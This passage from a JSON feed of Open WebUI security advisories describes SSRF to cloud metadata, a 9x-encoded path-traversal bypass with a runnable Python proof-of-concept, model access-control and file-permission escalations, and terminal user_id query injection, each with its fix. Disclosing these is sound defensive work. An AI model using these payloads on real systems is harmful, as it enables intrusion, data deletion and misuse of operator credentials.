of the messages. That account edits a victim's message, attaches structured payloads to it, and deletes a second victim message, all returning 200, with the channel history dumped before and after. Controls in the same run confirm the scoping: a read-only member is refused with 403, and a cross-member edit on a group channel is refused with 403.\n\n## Credits\n@Foxer131 — reported the missing authorship check on the standard-channel update and delete handlers.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T19:45:39.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-mj5r-jf49-m3w7","https://github.com/open-webui/open-webui/pull/27197","https://github.com/open-webui/open-webui/commit/c609ec41154fa092fa0af80d9d365de06b666286","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-mj5r-jf49-m3w7"],"source_kind":"github","identifiers":["GHSA-mj5r-jf49-m3w7","CVE-2026-70481"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T20:00:22.486Z","updated_at":"2026-09-03T03:00:45.104Z","epss_percentage":0.00299,"epss_percentile":0.21922,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tajVyLWpmNDktbTN3N84ABhSq","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tajVyLWpmNDktbTN3N84ABhSq","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.5.0, \u003c= 0.10.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tajVyLWpmNDktbTN3N84ABhSq/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13MnJ4LTg0aHAtZ2c5Nc4ABhSp","url":"https://github.com/advisories/GHSA-w2rx-84hp-gg95","title":"Open WebUI: SSRF into internal services via unvalidated sub-resource requests in the Playwright web loader","description":"## Summary\nWith the Playwright web loader enabled, Open WebUI opens user-submitted URLs in a real browser and validates the destination address before allowing the request. That check only ran for the top-level page request. Every other request the page issued was passed through unvalidated, so a page could use its own JavaScript to reach addresses the validation exists to block. Because the loader returns the page's final DOM to the requesting user, anything the page read back from those addresses ends up in the web-search or RAG output.\n\n## Preconditions\n- `WEB_LOADER_ENGINE=playwright`. This is not the default; deployments on the default web loader are unaffected.\n- A reachable Playwright browser, either local or via `PLAYWRIGHT_WS_URL`.\n- Any authenticated user who can submit a URL for ingestion or trigger a web search. No administrator role is required.\n- Something worth reading on a network the browser can reach. A deployment whose browser container has no route to internal services loses nothing here.\n\n## Impact\nAn authenticated user can read HTTP responses from services reachable by the browser process: cloud instance metadata, other containers on the same network, and internal APIs bound to private addresses. The content is returned to the user through the normal web-search or document-ingestion result, so this is a read primitive, not a blind one. It confers no write access and no availability impact, and it does not extend beyond what the browser's network position already allows.\n\n## Fix\nFixed in 0.11.0 by commit `bef63a2ae`. Every intercepted request is now validated, fetched with redirects disabled, re-validated on each redirect hop and then fulfilled, so neither a sub-resource nor a redirect can land on a non-global address. The same change blocks the two paths that never reached the interceptor at all: service-worker requests, via `service_workers=\"block\"`, and WebSocket connections, via a route handler that never connects upstream. Upgrading to 0.11.0 fully resolves the issue; no configuration change is required.\n\n## Root cause\nAffected component: `SafePlaywrightURLLoader` in `backend/open_webui/retrieval/web/utils.py`, in both the sync and async request interceptors. Affected setup: only builds running the Playwright loader engine.\n\nThe interceptor was written to guard navigation, and its first action was to return early for any request whose resource type was not `document`. The intent was that only the page the user asked for needs address validation, but a browser page is not a single request: once the validated document loads, its scripts issue further requests under the page's own control, and those never reached the validation. The address check was therefore applied to the one request the attacker did not need to control, and skipped on every request they did.\n\n## Proof of concept\nReported against 0.10.2 by driving the interceptor directly with stand-in route and request objects, one call per resource type, against `http://169.254.169.254/latest/meta-data/`. The `document` type is aborted; every other type is continued unvalidated. The browser and the network request were seeded rather than driven end to end; the code path exercised is the one the browser reaches for each sub-resource.\n\n## Credits\n- **@edwardav970** — identified that address validation was applied only to the top-level document request, leaving every sub-resource type unvalidated.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-04T19:40:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-w2rx-84hp-gg95","https://github.com/open-webui/open-webui/pull/27526","https://github.com/open-webui/open-webui/commit/bef63a2ae915571d50d2722a635e8bfa753d7877","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-w2rx-84hp-gg95"],"source_kind":"github","identifiers":["GHSA-w2rx-84hp-gg95","CVE-2026-70479"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T20:00:22.486Z","updated_at":"2026-09-03T03:00:46.781Z","epss_percentage":0.0026,"epss_percentile":0.17269,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13MnJ4LTg0aHAtZ2c5Nc4ABhSp","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13MnJ4LTg0aHAtZ2c5Nc4ABhSp","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.9.6, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13MnJ4LTg0aHAtZ2c5Nc4ABhSp/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mcnZqLWM1cXAteGo0d84ABfsf","url":"https://github.com/advisories/GHSA-frvj-c5qp-xj4w","title":"open-webui terminal proxy path traversal guard bypass via 9x encoded traversal","description":"AI assistance was used to help inspect the code and prepare this report.\n\n## Summary\n\nThe fix for GHSA-r2wg-2mcr-66rv is incomplete in v0.9.6 and current main. `backend/open_webui/routers/terminals.py` documents `_sanitize_proxy_path()` as decoding until stable, but the implementation stops after 8 `unquote()` passes. A 9x percent-encoded `../...` path parameter remains once-encoded after the loop, passes the `posixpath.normpath()` and `cleaned.startswith('..')` checks, and is forwarded to the configured terminal server. The upstream server then receives a decoded traversal path such as `/base/../admin/system`.\n\n## Impact\n\nA user who has access to an admin-configured terminal connection can bypass the terminal proxy path traversal guard and cause Open WebUI to forward requests with the configured terminal credentials and `X-User-Id` header to paths outside the intended normalized proxy path. For orchestrator-backed terminal connections the same sanitized path is placed under `/p/{policy_id}/{safe_path}`, so the bypass can also target sibling or parent routes after upstream decoding. This is a bypass of the same terminal proxy boundary covered by GHSA-r2wg-2mcr-66rv.\n\nThis does not require adding a malicious terminal server or convincing an administrator to weaken settings. The attacker only needs normal access to an existing configured terminal connection.\n\n## Reproduction\n\nThe following standalone Python script mirrors the current sanitizer and uses a local aiohttp server as the terminal-server canary. It shows that 8x encoding is rejected but 9x encoding is accepted and forwarded as a traversal after the upstream framework decodes the path.\n\n```python\nimport asyncio, posixpath\nfrom urllib.parse import unquote\nfrom aiohttp import web, ClientSession, ClientTimeout\n\ndef sanitize(path):\n    decoded = path\n    for _ in range(8):\n        once = unquote(decoded)\n        if once == decoded:\n            break\n        decoded = once\n    cleaned = posixpath.normpath(decoded).lstrip('/')\n    if cleaned.startswith('..') or cleaned == '.':\n        return None\n    return cleaned\n\ndef enc(s, rounds):\n    out = ''.join(f'%{b:02X}' for b in s.encode())\n    for _ in range(rounds - 1):\n        out = out.replace('%', '%25')\n    return out\n\nasync def main():\n    async def handler(request):\n        return web.json_response({'raw_path': request.raw_path, 'path': request.path})\n    app = web.Application()\n    app.router.add_route('*', '/{tail:.*}', handler)\n    runner = web.AppRunner(app)\n    await runner.setup()\n    site = web.TCPSite(runner, '127.0.0.1', 0)\n    await site.start()\n    port = site._server.sockets[0].getsockname()[1]\n\n    for rounds in (8, 9):\n        safe = sanitize(enc('../admin/system', rounds))\n        print(rounds, safe)\n        if safe:\n            url = f'http://127.0.0.1:{port}/base/{safe}'\n            async with ClientSession(timeout=ClientTimeout(total=10)) as session:\n                async with session.get(url) as response:\n                    print(await response.json())\n    await runner.cleanup()\n\nasyncio.run(main())\n```\n\nObserved output on current main and v0.9.6 sanitizer:\n\n```text\n8 None\n9 %2E%2E%2F%61%64%6D%69%6E%2F%73%79%73%74%65%6D\n{'raw_path': '/base/..%2Fadmin%2Fsystem', 'path': '/base/../admin/system'}\n```\n\nThe 9x encoded path argument is 285 bytes long, so this is not a megabyte-sized or impractical URL. When sent through the real route, account for the ASGI server decoding the HTTP path once before filling the `{path:path}` parameter: an external request can use one additional encoding layer so `_sanitize_proxy_path()` receives the 9x encoded parameter shown above.\n\n## Root Cause / Technical Details\n\n`_sanitize_proxy_path()` in `backend/open_webui/routers/terminals.py` performs this loop:\n\n```python\ndecoded = path\nfor _ in range(8):\n    once = unquote(decoded)\n    if once == decoded:\n        break\n    decoded = once\n```\n\nThe subsequent traversal check is applied only to the value after those 8 iterations. If the input still contains encoded dot and slash bytes after the loop, `posixpath.normpath()` treats them as ordinary characters rather than path separators. The code then builds `target_url = f'{base_url}/{safe_path}'` and sends it with `aiohttp.ClientSession.request()`. The upstream server receives and decodes the forwarded path, turning the accepted `%2E%2E%2F...` into `../...`.\n\nThe same vulnerable sanitizer is present in v0.9.6, the latest release. I verified the v0.9.6 `backend/open_webui/routers/terminals.py` hash matches current main for this file.\n\n## Remediation\n\nDo not rely on a fixed decode-depth cap for a traversal security boundary. Recommended fixes:\n\n1. Decode until stable with a strict input length cap, and reject if the final value still contains encoded dot, slash, or backslash separators.\n2. Reconstruct the allowed relative path from fully decoded segments: split on path separators, reject empty/current/parent segments, then join allowed segments with `/`.\n3. Add regression tests for at least 9x and 10x encoded `../` payloads, including a route-level test that accounts for the ASGI server's initial path decode before the `{path:path}` parameter reaches `_sanitize_proxy_path()`.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-24T21:05:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-frvj-c5qp-xj4w","https://nvd.nist.gov/vuln/detail/CVE-2026-59221","https://github.com/open-webui/open-webui/pull/26050","https://github.com/open-webui/open-webui/commit/05098d25a58d03738e01c4e85e8852c3b4ad849c","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-frvj-c5qp-xj4w"],"source_kind":"github","identifiers":["GHSA-frvj-c5qp-xj4w","CVE-2026-59221"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T22:00:08.731Z","updated_at":"2026-09-03T03:00:53.975Z","epss_percentage":0.00483,"epss_percentile":0.39539,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcnZqLWM1cXAteGo0d84ABfsf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mcnZqLWM1cXAteGo0d84ABfsf","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.9.6, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcnZqLWM1cXAteGo0d84ABfsf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tM3FmLTU4d2Ytdzk3Oc4ABfse","url":"https://github.com/advisories/GHSA-m3qf-58wf-w979","title":"Open WebUI: Arena task endpoints can bypass underlying model access controls","description":"## Summary\n\nAn authenticated non-admin user with read access to an arena wrapper model can reach a restricted underlying model through task endpoints such as `/api/v1/tasks/moa/completions`.\n\nThe normal chat route resolves arena models before the final chat dispatch and therefore re-checks the selected underlying model. The task routes call `utils.chat.generate_chat_completion()` directly. In that direct path, arena fallback resolution happens after the wrapper access check and then recurses with `bypass_filter=True`, skipping the selected submodel's access check.\n\n## Technical Details\n\nOpen WebUI's current model-access behavior already denies direct access to the restricted model. The normal chat path also denies the selected restricted model after arena preprocessing. The task endpoint path is inconsistent with that protected behavior because it reaches the same restricted model only through the direct arena fallback and recursive `bypass_filter=True`.\n\nThis report does not rely on malicious provider configuration, user-authored Tools/Functions, or direct code execution. The crossed boundary is model read authorization.\n\nAlthough the arena wrapper must be readable by the user, this is not just an \"admin exposed a restricted model\" configuration claim. The same configured arena is denied by the normal chat post-preprocessor control once the selected restricted model is the dispatch target. The bypass is specific to task endpoints that skip that preprocessor and enter the fallback arena resolver.\n\nOfficial documentation also points to this interpretation:\n\n- Open WebUI documents model access control as restricting models to specific users or groups.\n- The workspace-model documentation treats \"wrapper checked, restricted underlying model reached\" as broken access control and recommends independent entries for curated deployments.\n- The evaluation documentation describes arena mode as an evaluation/comparison feature that randomly selects models to compare, not as a feature that grants access to otherwise restricted models.\n- This is not an unsafe-admin-action report: the same intended model access restriction is enforced on the direct model path and on the normal-chat selected-model control, then bypassed only through the task endpoint call order.\n\n## PoV\n\nThe attached local PoV does not start a server and does not contact any model provider. It imports the current Open WebUI task endpoint and replaces provider dispatch plus model-access checks with local stubs so the call graph can be observed safely.\n\nObserved result:\n\n| Case | Expected | Actual |\n| --- | --- | --- |\n| Direct task request with `model=restricted-model` | Denied before provider dispatch | Denied; no provider call recorded |\n| Normal-chat post-preprocessor control with `model=restricted-model` and `metadata.selected_model_id=restricted-model` | Denied before provider dispatch | Denied; no provider call recorded |\n| Task request with `model=public-arena` that selects `restricted-model` | Denied when selected model is restricted | Local provider stub reached with `model=restricted-model` and `bypass_filter=true` |\n\nIn the arena task case, the restricted model is absent from the access-check log.\n\n## Impact\n\nA regular user can use a readable arena wrapper as an oracle for a restricted model via task-generation endpoints. For `/api/v1/tasks/moa/completions`, the caller controls the task prompt and receives the generated response.\n\nThe crossed security boundary is model read authorization: a non-admin user who is denied direct access to a model can still cause Open WebUI to dispatch a request to that model with the operator-configured backend credentials.\n\nThis can allow:\n\n- use of paid or internal models with the admin-configured provider key;\n- bypass of model access grants shown in the model selector;\n- cost and usage impact on pay-per-token providers;\n- exposure of model behavior or internal deployment capabilities that admins intended to restrict.\n\nSuggested CVSS v3.1: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L` = 7.6.\n\nPrimary CWE: CWE-862, Missing Authorization.\n\nAuthentication is required, so `PR:L` is used. User interaction is not required. The confidentiality impact is High because the attacker can query a model the administrator intended to restrict. Integrity and availability are Low because the request can consume provider quota and produce model output under an authorization decision the system would otherwise deny.\n\nThis should not be Critical: exploitation requires an authenticated user and a readable arena wrapper, does not cross into another security authority, and does not provide arbitrary code execution or full instance compromise.\n\n## Suggested Fix\n\nDo not use `bypass_filter=True` for arena fallback dispatch unless the selected underlying model has already been authorized for the caller.\n\nRecommended changes:\n\n- after selecting `selected_model_id`, load the selected model and call `check_model_access(user, selected_model)` before recursive dispatch;\n- for `filter_mode=exclude` or empty `model_ids`, build the candidate pool from models the current user can read, not every non-arena model in `request.app.state.MODELS`;\n- add regression tests for `/api/v1/tasks/moa/completions`, `/api/v1/tasks/title/completions`, `/api/v1/tasks/tags/completions`, and normal `/api/chat/completions` arena behavior.\n\n## Appendix: Affected Components\n\n- `backend/open_webui/routers/tasks.py`\n- `/api/v1/tasks/moa/completions` builds a payload from caller-controlled `model`, `prompt`, and `responses`, then calls `generate_chat_completion(request, form_data=payload, user=user)`.\n- `backend/open_webui/utils/chat.py`\n- checks access for the user-supplied arena wrapper model.\n- fallback arena resolution selects an underlying model when the caller did not pass through `process_chat_payload()`.\n- recursive dispatch uses `bypass_filter=True`.\n- `backend/open_webui/utils/models.py`\n- arena wrapper access checks only wrapper `access_grants`.\n\nCurrent-head references:\n\n- `backend/open_webui/routers/tasks.py:662-707`\n- `backend/open_webui/utils/chat.py:190-204`\n- `backend/open_webui/utils/chat.py:215-240`\n- `backend/open_webui/utils/chat.py:248-269`\n- `backend/open_webui/utils/middleware.py:2323-2347`\n- `backend/open_webui/utils/models.py:378-407`\n\n## Appendix: Duplicate Analysis\n\nThis is distinct from `GHSA-9vvh-qmjx-p4q8` / `CVE-2026-44555`, which covers `base_model_id` chaining and user-created workspace models. Current head includes the base-model-chain access fix through `has_base_model_access`.\n\nThis report covers task endpoints that call `generate_chat_completion()` without the main chat preprocessor. The root cause is arena fallback plus recursive `bypass_filter=True`, not `base_model_id`.\n\nLive duplicate sweep before submission also reviewed:\n\n- `GHSA-v6qf-75pr-p96m`: exposed HTTP query parameter `?bypass_filter=true`. This report does not rely on caller-controlled query parameters; the task endpoint reaches the server-side recursive `bypass_filter=True` path after arena fallback resolution.\n- `GHSA-hp5m-24vp-vq2q`: `/api/openai/responses` passthrough missing model authorization. This report targets `/api/v1/tasks/moa/completions` and the arena resolver inside `utils.chat.generate_chat_completion()`.\n- `GHSA-gfm2-xm6c-37qc`: chat ownership authorization in completions. This report does not require another user's chat ID.\n\nIf maintainers prefer to treat this as the same broad \"wrapper checked, underlying model not checked\" class, it should still be a distinct exploitation vector and affected component: task endpoints, not model creation/import or `base_model_id` dispatch.\n\n## Appendix: Preconditions\n\n- Authenticated non-admin user.\n- The user can read an arena wrapper model, for example a custom arena with a public read grant.\n- The arena model includes at least one restricted underlying model that the user cannot query directly.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T20:54:23.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-m3qf-58wf-w979","https://nvd.nist.gov/vuln/detail/CVE-2026-59225","https://github.com/open-webui/open-webui/pull/26046","https://github.com/open-webui/open-webui/commit/dc4924b66e655b315e3be4430a3e51b7d5c20acc","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-m3qf-58wf-w979"],"source_kind":"github","identifiers":["GHSA-m3qf-58wf-w979","CVE-2026-59225"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T21:00:08.731Z","updated_at":"2026-09-03T03:00:53.975Z","epss_percentage":0.00211,"epss_percentile":0.11215,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tM3FmLTU4d2Ytdzk3Oc4ABfse","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tM3FmLTU4d2Ytdzk3Oc4ABfse","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.8.12, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tM3FmLTU4d2Ytdzk3Oc4ABfse/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yeHdtLTRoMnEtZ2dmeM4ABfsd","url":"https://github.com/advisories/GHSA-2xwm-4h2q-ggfx","title":"Open WebUI: Model meta.knowledge read-only file access can be upgraded to file write/delete","description":"## Summary\n\nCurrent `main` and `v0.9.6` still allow an authenticated user to turn read-only access to another user's file into write/delete access by attaching that file ID to an attacker-controlled workspace model.\n\nThis is an incomplete-fix variant of `GHSA-vjqm-6gcc-62cr`. The current fix adds `_verify_knowledge_file_access()`, but the validator only checks `has_access_to_file(file_id, \"read\", user)`. The file write/delete routes later trust `has_access_to_file(file_id, \"write\", user)`, and that function grants access through any writable model whose `meta.knowledge` contains the file ID.\n\nThe PoV includes a negative control showing the current validator rejects an inaccessible arbitrary file ID. The residual issue is narrower: a file ID that is readable only through a KB read grant is accepted into direct model file metadata, then the same model metadata satisfies later file write/delete checks.\n\n## Technical Details\n\n`backend/open_webui/routers/models.py::_verify_knowledge_file_access()` accepts model `meta.knowledge` file entries when the caller can read the file:\n\n```python\nif not await has_access_to_file(file_id, 'read', user, db=db):\n    raise HTTPException(...)\n```\n\n`backend/open_webui/utils/access_control/files.py::has_access_to_file()` then uses attacker-writable model metadata as a source for any requested access type:\n\n```python\nfor model in await Models.get_models_by_user_id(user.id, permission=access_type, db=db):\n    knowledge_items = getattr(model.meta, 'knowledge', None) or []\n    for item in knowledge_items:\n        if isinstance(item, dict) and item.get('type') == 'file' and item.get('id') == file.id:\n            return True\n```\n\nFor `access_type=\"write\"`, the attacker-owned model satisfies the model query, so the victim file becomes writable even though the attacker only had read access through the KB grant.\n\nThis crosses another user's integrity and availability boundary, not just the attacker's own account. Before model metadata is involved, the attacker can read the file through a KB grant but cannot write it. After the model metadata entry is accepted, the same file becomes writable/deletable.\n\nThe official docs distinguish attached knowledge permissions: knowledge-base collections may use explicit read grants, while individual files are owner/admin-only. This issue lets a read grant to a KB become direct write/delete authority over an individual file.\n\nThis is also consistent with the documented RBAC model: resource grants have separate `read` and `write` permissions, where write means the user can update or delete the resource. The exploit starts from a read-only KB grant and reaches file write/delete without a corresponding file owner/admin/write authorization.\n\nThe required Models workspace access is not root-equivalent in Open WebUI's documentation. The policy's root-equivalent warning applies to Tools/Functions code execution. This report does not use Tools/Functions, custom Python, admin actions, or a legacy-only path.\n\n## Impact\n\nAn authenticated non-admin user with Models workspace access and read-only access to a victim file through a knowledge-base grant can create/import/update a model that references the file, then rename, overwrite, or delete the victim user's file through write-gated file routes.\n\nConfirmed sinks in current head:\n\n- `POST /api/v1/files/{id}/rename`\n- `POST /api/v1/files/{id}/data/content/update`\n- `DELETE /api/v1/files/{id}`\n\nSuggested severity: High.\n\nSuggested CVSS:\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\n```\n\nSuggested CWE:\n\n```text\nCWE-863: Incorrect Authorization\n```\n\nI am not claiming Critical severity because the attacker must be authenticated, must have Models workspace access, and must already have read-only access to the victim file through a KB grant. The High score is based on the post-condition: that limited read access becomes destructive cross-user file write/delete.\n\n## Appendix: AI Disclosure\n\n## Appendix: Local PoV\n\nThe PoV is local-only. It does not start a server, send network traffic, or use a real database. It loads and executes the current-head function bodies for:\n\n- `has_access_to_file()`\n- `_verify_knowledge_file_access()`\n- `delete_file_by_id()`\n\nRun from the harness root:\n\n```bash\nuv run python attached-evidence/poc/pov_openwebui_model_file_read_to_write.py\n```\n\nObserved output:\n\n```json\n{\n  \"confirmed\": true,\n  \"control_inaccessible_file_rejected_by_validator\": true,\n  \"control_read_allowed_via_kb_read_grant\": true,\n  \"control_write_allowed_before_model_laundering\": false,\n  \"model_metadata_validator_passed_with_read_only_access\": true,\n  \"write_allowed_after_attacker_owned_model_contains_file\": true,\n  \"delete_route_result\": {\n    \"message\": \"File deleted successfully\"\n  },\n  \"deleted_file_ids\": [\n    \"victim-file\"\n  ]\n}\n```\n\nThis demonstrates expected versus actual behavior:\n\n- Expected: a user with only read access through a KB grant cannot mutate the victim file.\n- Actual: after the read-only file ID is accepted into attacker-owned model metadata, the same user satisfies the file write/delete guard and deletes the victim file.\n\n## Appendix: Remediation\n\nRecommended defense-in-depth fix:\n\n1. In `_verify_knowledge_file_access()`, require direct file ownership or admin for `type: \"file\"` model knowledge entries. Do not accept indirect KB read access as sufficient authority to attach an individual file to a model.\n2. In `has_access_to_file()`, do not let the model `meta.knowledge` branch grant write access to files. Model-attached knowledge should be read-only unless the caller separately owns/administers the underlying file or has an explicit write-capable file authorization path.\n3. Add regression tests covering the KB-read control, the blocked model attach, and rename/update/delete denial for the victim file.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T20:51:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-2xwm-4h2q-ggfx","https://nvd.nist.gov/vuln/detail/CVE-2026-59212","https://github.com/open-webui/open-webui/pull/26032","https://github.com/open-webui/open-webui/commit/17df0264929514599dbcb21c6578bcdfa204b04d","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-2xwm-4h2q-ggfx"],"source_kind":"github","identifiers":["GHSA-2xwm-4h2q-ggfx","CVE-2026-59212"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T21:00:08.731Z","updated_at":"2026-09-03T03:00:53.975Z","epss_percentage":0.0042,"epss_percentile":0.34754,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeHdtLTRoMnEtZ2dmeM4ABfsd","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yeHdtLTRoMnEtZ2dmeM4ABfsd","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.9.6, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeHdtLTRoMnEtZ2dmeM4ABfsd/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qNjU3LW00YzQtMjRqcc4ABfsc","url":"https://github.com/advisories/GHSA-j657-m4c4-24jq","title":"Open WebUI: Terminal proxy forwards a spoofable, integrity-unbound user identity to the upstream (X-User-Id header and ws_terminal session_id query injection)","description":"## Summary\n\nThe terminal proxy in `backend/open_webui/routers/terminals.py` forwards the Open WebUI user's identity to the upstream terminal server / backend coordinator as an authorization claim, with no cryptographic binding to the session that produced it. The forwarded identity is attacker-influenceable on both proxy paths:\n\n1. **HTTP path (`proxy_terminal`)** sets `headers['X-User-Id'] = user.id`. Upstreams that trust `X-User-Id` as identity receive it unsigned, so an attacker who can reach the upstream by other means (directly, a compromised peer, SSRF) can spoof it.\n2. **WebSocket path (`ws_terminal`)** is exploitable through Open WebUI itself, with no \"other means\" required. It interpolates the path parameter `session_id` directly into the upstream URL and then appends `?user_id=\u003ccaller\u003e`:\n\n   ```python\n   upstream_url = f'{ws_base}/p/{policy_id}/api/terminals/{session_id}'\n   upstream_url += f'?{urllib.parse.urlencode({\"user_id\": user.id})}'\n   ```\n\n`session_id` is neither validated nor URL-encoded (the HTTP sibling runs `_sanitize_proxy_path`; this path runs nothing). An encoded `?`/`\u0026` smuggled through `session_id` survives Open WebUI's single decode and is re-decoded by the upstream, injecting an attacker-chosen `user_id` ahead of the appended one. Query parsing binds the first occurrence, so the backend coordinator resolves the spoofed user's terminal scope.\n\n## Technical Details\n\nThe forwarded terminal identity is a bearer-style authorization claim with no integrity binding, and on the WebSocket path it is additionally injectable because `session_id` is concatenated into the URL without encoding or delimiter validation.\n\n## Impact\n\nA normal authenticated user can make the terminal proxy present another user's identity to the upstream backend coordinator. On backend coordinator-backed (`policy_id`) servers that scope terminal containers by `user_id`, this reaches another user's terminal scope; combined with a known active session ID (for example a chat-scoped session ID surfaced through a shared chat), it allows attaching to that user's live PTY. The HTTP-path variant additionally allows identity spoofing at the upstream tier for any deployment whose upstream trusts `X-User-Id`.\n\n## Appendix: Affected code\n\n- `backend/open_webui/routers/terminals.py` — `proxy_terminal` sets `headers['X-User-Id'] = user.id` with no signature.\n- `backend/open_webui/routers/terminals.py` — `ws_terminal` builds the upstream URL from an unvalidated, unencoded `session_id` and appends `user_id` as a query parameter, allowing query injection.\n\n## Appendix: Consolidation\n\nPer the Report Handling policy, this consolidates independent reports of the same root cause (the forwarded terminal identity is spoofable / not integrity-bound) into the earliest filing:\n\n- **@smoke-wolf** (earliest filing) — the `X-User-Id` HTTP-path identity is forwarded without integrity binding, spoofable where the upstream trusts the header.\n- **@rexpository** — the `ws_terminal` `session_id` query-injection vector, proving the forwarded `user_id` is spoofable through the Open WebUI proxy itself, with no \"reach the upstream by other means\" precondition.\n\n## Appendix: Recommended fix\n\n- Validate and URL-encode `session_id` before building the upstream URL (`urllib.parse.quote(session_id, safe=\"\")`; reject `?`, `#`, `\u0026`, `/`, `%`, backslash, control characters). Build the query string with a URL builder so attacker-controlled path content cannot precede it.\n- Bind the forwarded identity instead of passing a raw `user_id` / `X-User-Id`: emit a short-lived signed claim (for example HS256 over `{uid, iat, aud:server_id}` with a key shared only with the specific upstream) and verify it upstream.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-24T20:49:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.0,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-j657-m4c4-24jq","https://nvd.nist.gov/vuln/detail/CVE-2026-59224","https://github.com/open-webui/open-webui/pull/26042","https://github.com/open-webui/open-webui/commit/5f3a628a8d291bb5d33e1a0b0c89fb62a2927934","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-j657-m4c4-24jq"],"source_kind":"github","identifiers":["GHSA-j657-m4c4-24jq","CVE-2026-59224"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T21:00:08.731Z","updated_at":"2026-09-03T03:00:53.976Z","epss_percentage":0.00391,"epss_percentile":0.31853,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qNjU3LW00YzQtMjRqcc4ABfsc","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qNjU3LW00YzQtMjRqcc4ABfsc","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003c 